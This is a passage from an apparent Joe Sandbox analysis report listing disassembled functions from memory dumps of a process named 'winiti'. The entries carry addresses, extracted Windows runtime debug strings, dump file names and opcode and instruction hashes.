                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: %%%u$]:%u
                              • API String ID: 48624451-3050659472
                              • Opcode ID: 5408e32c27e0365bb9258406970a07bd79e931cb13b287e62ed3918c5283305d
                              • Instruction ID: 6089572b756050d37546f01925b54d2a88f3b232f67c0fcb38d9f059239c124e
                              • Opcode Fuzzy Hash: 5408e32c27e0365bb9258406970a07bd79e931cb13b287e62ed3918c5283305d
                              • Instruction Fuzzy Hash: F021C1B290032AABCB20AE75AC459EF77ACDB14718F151525FC04A3141E7789E58CBE1
                              Function 00DA53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                              Download Yara Rule
                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE22F4
                              Strings
                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00DE22FC
                              • RTL: Re-Waiting, xrefs: 00DE2328
                              • RTL: Resource at %p, xrefs: 00DE230B
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                              • API String ID: 885266447-871070163
                              • Opcode ID: f6dec85db91862a397546d0610bce4f618c25ef478e55a4c1e6aea7bef2f3155
                              • Instruction ID: cd98a34b3925e77c78b5395e52239a998393075ef00bb680bfc03d823a5e9259
                              • Opcode Fuzzy Hash: f6dec85db91862a397546d0610bce4f618c25ef478e55a4c1e6aea7bef2f3155
                              • Instruction Fuzzy Hash: 605117716006066BDF11EB25DC81FAB73ACEF99364F104229FD48DB285EA71ED418BB0
                              Function 00DAEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                              Download Yara Rule
                              Strings
                              • RTL: Re-Waiting, xrefs: 00DE24FA
                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00DE24BD
                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00DE248D
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                              • API String ID: 0-3177188983
                              • Opcode ID: e2cdbe59c48fbfa50c07fe6354205ff76e63512c11279a9af9f8f97345431396
                              • Instruction ID: c251ca52ee33fcbad021fd22c49fea45f08f675482151cb16ec3fd2028bc81d2
                              • Opcode Fuzzy Hash: e2cdbe59c48fbfa50c07fe6354205ff76e63512c11279a9af9f8f97345431396
                              • Instruction Fuzzy Hash: AF41E470600204AFDB20EB69CC8AF6A77ACEF85720F248609F5559B2C1E734E941CB71
                              Function 00DBFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: __fassign
                              • String ID:
                              • API String ID: 3965848254-0
                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                              • Instruction ID: 09704703db8b2d99e5237f86e526ba285f2235d764904b5672a18b3862a7f8a4
                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                              • Instruction Fuzzy Hash: F5916E71D0024AEBDF24DFA9CC456FEB7B4EF55314F24807AE452A7292E7309A41CBA1
                              Function 00E35CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: __aulldvrm
                              • String ID: $$0
                              • API String ID: 1302938615-389342756
                              • Opcode ID: 7ccad1ccac3131c08c28d5a149851017079e5cb00c4a3baf394290a309ff3829
                              • Instruction ID: d21b8a3bb8615e2a1dbc987f5bcf40f8732b9f017c7b6aa251a1e51ecd5f84d8
                              • Opcode Fuzzy Hash: 7ccad1ccac3131c08c28d5a149851017079e5cb00c4a3baf394290a309ff3829
                              • Instruction Fuzzy Hash: 0D919032D04A8ADEDF24DF99C4493EEBFB0AF01314F14669AD8A1B7391C3744A41CB50